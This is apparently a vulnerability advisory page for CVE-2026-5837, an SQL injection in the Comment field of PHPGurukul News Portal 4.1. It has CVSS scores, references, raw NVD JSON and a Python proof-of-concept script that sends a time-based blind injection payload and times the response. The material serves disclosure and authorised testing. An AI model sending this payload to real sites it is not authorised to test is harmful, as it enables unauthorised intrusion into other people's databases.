CVE-2026-5837

Description

A vulnerability was found in PHPGurukul News Portal Project 4.1. This affects an unknown part of the file /news-details.php. The manipulation of the argument Comment results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

PHPGurukul News Portal Project 4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli_vulnerability(target_url):
    """
    Proof of Concept for CVE-2026-5837
    Tests the 'Comment' parameter in /news-details.php for SQL Injection.
    """
    # The endpoint vulnerable to injection
    full_url = f"{target_url}/news-details.php"
    
    # Payload to test for time-based blind SQL injection
    # Adjust the news ID (nid) if necessary based on the application logic
    payload = {
        "nid": "1", 
        "Comment": "test' AND SLEEP(5)-- -"
    }

    try:
        print(f"[*] Sending request to {full_url}...")
        response = requests.post(full_url, data=payload, timeout=10)
        
        # Check if the request took longer than usual due to SLEEP(5)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! The application responded with a delay.")
            print("[+] This indicates that the 'Comment' parameter is vulnerable to SQL Injection.")
        else:
            print("[-] Vulnerability not detected or payload incorrect.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost/phpgurukul-news"
    check_sqli_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5837
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5837
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5837/
[4] VulDB https://vuldb.com/cve/CVE-2026-5837
[5] https://github.com/f1rstb100d/CVE/issues/25
[6] https://phpgurukul.com/
[7] https://vuldb.com/submit/789775
[8] https://vuldb.com/vuln/356293
[9] https://vuldb.com/vuln/356293/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5837", "sourceIdentifier": "[email protected]", "published": "2026-04-09T04:17:23.597", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in PHPGurukul News Portal Project 4.1. This affects an unknown part of the file /news-details.php. The manipulation of the argument Comment results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/f1rstb100d/CVE/issues/25", "source": "[email protected]"}, {"url": "https://phpgurukul.com/", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/789775", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/356293", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/356293/cti", "source": "[email protected]"}]}}